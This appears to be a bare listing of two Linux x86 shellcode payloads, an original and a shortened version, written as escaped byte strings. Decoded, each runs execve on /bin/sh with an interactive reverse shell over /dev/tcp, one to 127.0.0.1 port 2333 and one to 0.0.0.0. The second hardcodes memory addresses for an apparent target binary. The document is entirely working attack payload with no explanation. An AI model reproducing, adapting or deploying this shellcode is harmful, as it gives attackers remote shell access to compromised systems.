 original version, length:95 bytes
"\xeb\x26\x31\xc0\x5e\x88\x46\x32"
"\x88\x46\x0a\x88\x46\x07\x50\x89"
"\xf3\x83\xc3\x0b\x53\x89\xf2\x83"
"\xc2\x08\x52\x56\x31\xc0\x31\xd2"
"\x89\xe1\x89\xf3\xb0\x0b\xcd\x80"
"\xe8\xd5\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x2c\x2d\x63\x2c"
"\x62\x61\x73\x68\x20\x2d\x69\x20"
"\x3e\x26\x20\x2f\x64\x65\x76\x2f"
"\x74\x63\x70\x2f\x31\x32\x37\x2e"
"\x30\x2e\x30\x2e\x31\x2f\x32\x33"
"\x33\x33\x20\x30\x3e\x26\x31";

reduced length version, length:82 bytes
"\x31\xc0\xa2\xa8\x83\x04\x08\xa2"
"\xa5\x83\x04\x08\x50\x68\xa9\x83"
"\x04\x08\x68\xa6\x83\x04\x08\x68"
"\x9e\x83\x04\x08\x31\xd2\x89\xe1"
"\xbb\x9e\x83\x04\x08\xb0\x0b\xcd"
"\x80\x2f\x62\x69\x6e\x2f\x73\x68"
"\x2c\x2d\x63\x2c\x73\x68\x20\x2d"
"\x69\x3e\x26\x2f\x64\x65\x76\x2f"
"\x74\x63\x70\x2f\x30\x2e\x30\x2e"
"\x30\x2e\x30\x2f\x33\x20\x30\x3e"
"\x26\x31";